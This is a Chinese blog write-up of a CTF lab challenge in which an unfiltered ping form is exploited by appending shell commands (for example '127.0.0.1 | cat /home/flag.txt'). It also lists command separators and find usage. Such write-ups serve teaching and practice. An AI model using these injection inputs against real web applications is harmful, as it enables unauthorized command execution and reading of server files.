首页 > 其他分享 >[CTF] 攻防世界-command_execution

[CTF] 攻防世界-command_execution

时间:2022-12-25 20:24:17浏览次数:71  
标签:command1 command2 flag 命令 CTF command && execution find

题目:

小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。
界面如图

个人WP(官方的不好或者不全)

随便输入个东西试试

是ping的命令,加上题目说没有waf,猜测应该是能连接其他命令进去的
于是输入 123 && ls试试

没反应,感觉是123ping不通的问题,于是改成127.0.0.1 && ls

ping通了,而且执行了ls命令,所以只要找到flag并输出出来即可

因本人不会find命令,故根据经验去看根目录,输入 127.0.0.1 && ls /

发现并没有 flag,于是再次尝试进入home目录看看,幸好发现了flag

于是用cat命令输出

这个方法的问题:必须ping通了才执行后面的命令,而且需要根据经验去找flag

知识点总结

命令执行

参照用户露思的WP

windows 或 linux 下:
command1 && command2 先执行 command1,如果为真,再执行 command2
command1 | command2 只执行 command2
command1 & command2 先执行 command2 后执行 command1
command1 || command2 先执行 command1,如果为假,再执行 command2
命令执行漏洞(| || & && 称为 管道符)

另外,也可以用;来分隔两个命令,两个命令互不影响,与&效果相同

linux 下:
command1 ; command2 先执行 command2 后执行 command1

find命令

菜鸟编程的Linux find命令
C语言中文网的分类解释
注意:find 命令是完全匹配的,必须和搜索关键字一模一样才会列出。
命令格式

find 搜索路径 [选项] 搜索内容

find 是比较特殊的命令,它有两个参数:

  • 第一个参数用来指定搜索路径;
  • 第二个参数用来指定搜索内容。

按照文件名搜索
选项:

  • -name: 按照文件名搜索;
  • -iname: 按照文件名搜索,不区分文件名大小;
find / -name "flag.txt"  # 从根目录``/``下开始搜索``flag.txt``(区分大小写)
find / -iname "flag.txt"  # 从根目录``/``下开始搜索,不区分大小写
find / -iname "flag.txt" -o -iname "flag"  # 从根目录开始查找``flag.txt`` 或者 ``flag``(万一题目不写后缀呢)
# -o (or)选项代表逻辑或运算,也就是 -o 的两个条件只要其中一个成立,find 命令就可以找到结果。

官方WP

command_execution
[原理]

| 的作用为将前一个命令的结果传递给后一个命令作为输入

&&的作用是前一条命令执行成功时,才执行后一条命令
[目地]

掌握命令拼接的方法
[环境]

windows
[工具]

firefox
[步骤]

1.打开浏览器,在文本框内输入127.0.0.1 | find / -name “flag.txt” (将 | 替换成 & 或 && 都可以),查找flag所在位置,如图所示。

2.在文本框内输入 127.0.0.1 | cat /home/flag.txt 可得到flag,如图所示。

标签:command1,command2,flag,命令,CTF,command,&&,execution,find
From: https://www.cnblogs.com/faf4r/p/17004434.html

相关文章

  • 从一道CTF题学习python字节码到源码逆向
    概述:该题来源为2022爱春秋冬季赛ezpython,难度不是很大刚好适合我这样的萌新入门题目:30LOAD_CONST1(204)3LOAD_CONST......
  • [CTF] 攻防世界-simple_php
    题目<?phpshow_source(__FILE__);include("config.php");$a=@$_GET['a'];$b=@$_GET['b'];if($a==0 and $a){    echo $flag1;}if(is_numeric($b)){   ......
  • buctfN种方法解决和大白1
    下载文件后打开,是一个程序,运行不了,整了半天,最后不得不用上无敌的010打开,发现开头出现base64,然后就用Base64解码Base64编码UTF8GB2312UTF16GBK二进制十六进制解密......
  • whctf2017_note_sys
    whctf2017_note_sys最近太颓废了,zikh师傅上南京参加比赛了恭喜获得第五名,我太菜了,只能膜拜大佬。><,在学习一下vmpwn吧,正好zikh师傅写的一篇保护漏洞利用主要就是利......
  • CTF中网站用户登录页面渗透测试步骤
    CTF中网站用户登录页面渗透测试步骤CTF测试中经常遇到靶机的HTTP服务需要用户认证才能登录其后台,因此很多情况下需要绕开登录的认证限制或者得到用户名密码信息。按照优先......
  • cscctf_2019_qual_signal
    cscctf_2019_qual_signal总结没开pie,got表可写的时候,用magicgadget会有很好的效果多次调用ret2csu的时候注意利用重叠部分缩减payload可以通过read的返回值存储在rax......
  • buuoj-pwn-gwctf_2019_shellcode
    buuoj-pwn-gwctf_2019_shellcode总结可见字符shellcode优先判断能不能利用\x00非预期一手题目分析IDA打开,看不了main函数,但是汇编也挺简单的,看看汇编就知道是打开沙......
  • ctf 菜鸟杯
    web签到  首先最里面的是ctfshow-QQ群:,而他需要进行cookie传参,因此我们需要在cookie传入CTFshow-QQ群=a,然后就要以POST方式传入a的值,我们传入a=b,而b是以GET方式来传......
  • CTFSHOW_菜狗杯_WEB
    web签到<?php/*#-*-coding:utf-8-*-#@Author:h1xa#@Date:2022-11-1017:20:38#@LastModifiedby:h1xa#@LastModifiedtime:2022-11-1109:38:59......
  • whctf2017_stackoverflow
    whctf2017_stackoverflow前几天做的一道题几乎都是看zikh26师傅的文章写的,自己太菜,源码也才开始看保护策略漏洞分析可以泄露我们想要的地址,还有一个可以任意地址写一......